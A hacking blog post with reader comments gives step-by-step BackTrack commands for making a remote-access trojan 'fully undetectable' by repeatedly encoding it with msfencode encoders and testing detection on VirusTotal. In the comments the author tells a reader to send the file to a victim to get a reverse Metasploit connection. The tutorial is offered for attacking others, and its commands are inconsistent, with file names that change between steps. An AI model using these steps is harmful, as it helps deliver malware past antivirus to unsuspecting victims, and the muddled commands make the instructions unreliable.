hacking by Vineet Bharadwaj, Wifi Hacking, Facbook hacking, Gmail Hacking,android hacking,thehackingguide, Hacking by Vineet Bharadwaj, Website hacking, Mobile Hacking, Security, Hack Account, learn hack by vineet Bharadwaj,kingroot.apk rooting,windows tricks, Hack Facebook Account, Hack Gmail Account, Wifi hacking, Mobile Hacking, Learn Hacking, Security, Mobile USSD Code Hack, Tanki online Hack, Ip Address Hack,Hk rom Editor, Website Hacking, Lucky patcher, Facebook Hack,Kingroot android

How to FUD a RAT stub with backtrack/kali


How to FUD a RAT stub with Backtrack
Requirements:-
1. Backtrack Operating System
2. MSF encoders
So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use backtrack. Before going to FUD check your file with ant viruses at virustotal.com and we get a detection ratio for example lets say 30/44
Now start terminal in Backtrack and navigate to the directory where your file is located.
E.g. cd Desktop
So our first step is to change the permissions of that file (775) by typing this command
root@bt:~/Desktop# chmod 775 stub.exe
Further type this command to encode your virus,
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
You’ll notice Antivirus still detected it even though we encoded it 10 times with
“x86/shikata_ga_nai” encoder.
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server2.exe
Now 2nd time, we use another encoder named as “jmp_call_additive”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe
Now again we use another encoder named as “call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe
Now final we encode again with this encoder “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe
Now you'll get a final.exe, upload it to virustotal.com and you’ll see the results.
Previous
Next Post »

11 comments

Click here for comments
Anonymous
admin
August 31, 2014 at 9:58 PM ×

But then when I try to open it on windows it says that the version of this file is not compatible with the version of windows you're running. Check your computers system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.

Reply
avatar
Vineet
admin
September 2, 2014 at 2:31 AM ×

It wont open cause its a encoded file in backtrack just send it to any other victim or try on your cm machine it will give a reverse connection in metasploit or i suggest you might you did anything wrong during this process :)

Reply
avatar
Unknown
admin
November 19, 2014 at 10:51 PM ×

Is fud becouse is file raw and not ork is normally lol he don t have create exe at end lol

Reply
avatar
Vineet
admin
November 20, 2014 at 5:59 AM ×

R.I.P English -_- first of all its about to create stub FUD not a exe file .

Reply
avatar
Morda
admin
December 4, 2014 at 11:10 PM × This comment has been removed by the author.
avatar
Morda
admin
December 6, 2014 at 10:27 PM ×

You deleted my comment even tho I stuck up for you wow thanks....hope to see you soon

Reply
avatar
Vineet
admin
December 6, 2014 at 11:23 PM ×

Dont post backlinks over here . Use ur SEO techs somwhere else not on this blog. Leave a comment here or any query without any refer or back links. Hope you get it.

Reply
avatar
Morda
admin
December 7, 2014 at 11:34 PM × This comment has been removed by a blog administrator.
avatar
Vineet
admin
December 8, 2014 at 8:32 AM × This comment has been removed by the author.
avatar
Malte
admin
November 26, 2015 at 8:15 AM ×

After i type this command (msfencode -i /root/Desktop/RAT.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10)

It just stops there

Reply
avatar
Vineet
admin
November 26, 2015 at 8:28 AM ×

use msfvenom or watch my latest video which is related to msfvenom...

Thanks

Reply
avatar